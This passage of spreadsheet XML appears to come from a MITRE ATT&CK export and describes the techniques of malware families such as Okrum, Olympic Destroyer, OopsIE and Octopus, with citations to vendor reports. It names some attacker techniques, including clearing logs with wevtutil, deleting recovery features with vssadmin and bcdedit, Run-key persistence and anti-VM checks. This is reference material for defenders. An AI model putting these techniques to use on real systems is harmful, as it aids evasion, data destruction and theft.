    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as &lt;code&gt;sysctl hw.model&lt;/code&gt;.(Citation: ESET OceanLotus macOS April 2019)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used the &lt;code&gt;ioreg&lt;/code&gt; command to gather some of this information.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can collect the network interface MAC address on the infected host.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use the &lt;code&gt;touch -t&lt;/code&gt; command to change timestamps.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the &lt;code&gt;/tmp&lt;/code&gt; folder.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: sentinelone apt32 macOS backdoor 2020)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can break large files of interest into smaller chunks to prepare them for exfiltration.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to extract data from removable devices connected to the endpoint.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to recursively enumerate files on an infected endpoint.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can copy specific files, webcam captures, and screenshots to local directories.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has gained execution on targeted systems through luring users to click on links to malicious URLs.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can discover pluggable/removable drives to extract files from.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted process names on a compromised host.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can gain persistence by a creating a shortcut in the infected user's Startup directory.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture a screenshot of the current screen.(Citation: Talos Oblique RAT March 2021)
</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can hide its payload in BMP images hosted on compromised websites.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can halt execution if it identifies processes belonging to virtual machine software or analysis tools.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to check for blocklisted computer names on infected endpoints.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted usernames on infected endpoints.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture images from webcams on compromised hosts.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can delete files from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can extract drive information from the endpoint and search files on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can encode data with a NOT operation before sending the data to the control server.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the name and ID for every process running on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) has been delivered via spearphishing emails with Microsoft Office attachments.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the computer name from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the victim’s IP address.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can create a reverse shell on the infected endpoint using cmd.exe.(Citation: McAfee Oceansalt Oct 2018) [OceanSalt](https://attack.mitre.org/software/S0346) has been executed via malicious macros.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Octopus](https://attack.mitre.org/software/S0340) has compressed data before exfiltrating it using a tool called Abbrevia.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can exfiltrate files from the system using a documents collector tool.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has uploaded stolen files and data from a victim's machine over its C2 channel.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has exfiltrated data to file sharing sites.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect information on the Windows directory and searches for compressed RAR files on the host.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can download additional files and tools onto the victim’s machine.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has stored collected information in the Application Data directory on a compromised host.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has been disguised as legitimate programs, such as Java and Telegram Messenger.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) achieved persistence by placing a malicious executable in the startup directory and has added the &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; key to the Registry.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can capture screenshots of the victims’ machine.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has been delivered via spearsphishing emails.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has encoded C2 communications in Base64.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect system drive information, the computer name, the size of the disk, OS version, and OS architecture information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect the host IP address from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect the username from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has used HTTP GET and POST requests for C2 communications.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has used wmic.exe for local discovery information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to clear the System and Security event logs using &lt;code&gt;wevtutil&lt;/code&gt;.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain stored credentials from web browsers.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) overwrites files locally and on remote shares.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the native Windows utilities &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, and &lt;code&gt;bcdedit&lt;/code&gt; to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain credentials from LSASS, similar to [Mimikatz](https://attack.mitre.org/software/S0002). These credentials are used with [PsExec](https://attack.mitre.org/software/S0029) and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to help the malware propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) attempts to copy itself to remote machines on the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to enumerate all systems in the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [PsExec](https://attack.mitre.org/software/S0029) to interact with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Olympic Destroyer 2018)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) utilizes [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the API call &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; to disable all services on the affected system.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses API calls to enumerate the infected system's ARP table.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will shut down the compromised system after it is done modifying system configuration settings.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses WMI to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) steals credentials from its victims.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses Twitter as a backup C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with a simple character replacement scheme before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with GZipStream before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) exfiltrates command output and collected files to its C2 server in 1500-byte blocks.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can upload files from the victim's machine to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) has the capability to delete files and scripts from the victim's machine.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can download files from its C2 server to the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) stages the output from command execution and collected files in specific folders before exfiltration.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. [OopsIE](https://attack.mitre.org/software/S0264) also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates a scheduled task to run itself every three minutes.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) encodes data in hexadecimal format over the C2 channel.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query &lt;code&gt;SELECT * FROM MSAcpi_ThermalZoneTemperature&lt;/code&gt; to check the temperature to see if it’s running in a virtual environment.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates and uses a VBScript as part of its persistent execution.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the command prompt to execute commands on the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses WMI to perform discovery techniques.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) has used Technet and Pastebin web pages for command and control.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim drive information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can overwrite Registry settings to reduce its visibility on the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can download files onto the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can perform Registry operations.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) strings are base64 encoded, such as the embedded DLL known as MockDll.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather a process list from the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses process hollowing and [Regsvr32](https://attack.mitre.org/techniques/T1218/010) to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) and regsvr32 to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim's Internet Explorer version.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim OS version and whether it is 64 or 32 bit.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim proxy information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can execute shell commands.(Citation: Proofpoint Leviathan Oct 2017) [Orz](https://attack.mitre.org/software/S0229) can execute commands with JavaScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can copy files and Registry data from compromised hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can parse e-mails on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) has the ability to encode data.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use native command line for execution.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can automatically scan for and collect files with specific extensions.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can automatically upload collected files to its C2 server.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can collect information from a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t xml:space="preserve">[OutSteel](https://attack.mitre.org/software/S1017) can upload files from a compromised host over its C2 channel.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can delete itself following the successful execution of a follow-on payload.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can search for specific file extensions, including zipped files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can download files from its C2 server.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has relied on a user to execute a malicious attachment delivered via spearphishing.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has relied on a user to click a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can identify running processes on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has been distributed as a malicious attachment within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has used HTTP for C2 communications.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has used `cmd.exe` to scan a compromised host for specific file extensions.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to list its directory and logical drives.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has been loaded onto Exchange servers and disguised as an ISAPI filter (owaauth.dll). The IIS w3wp.exe process then loads the malicious DLL.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
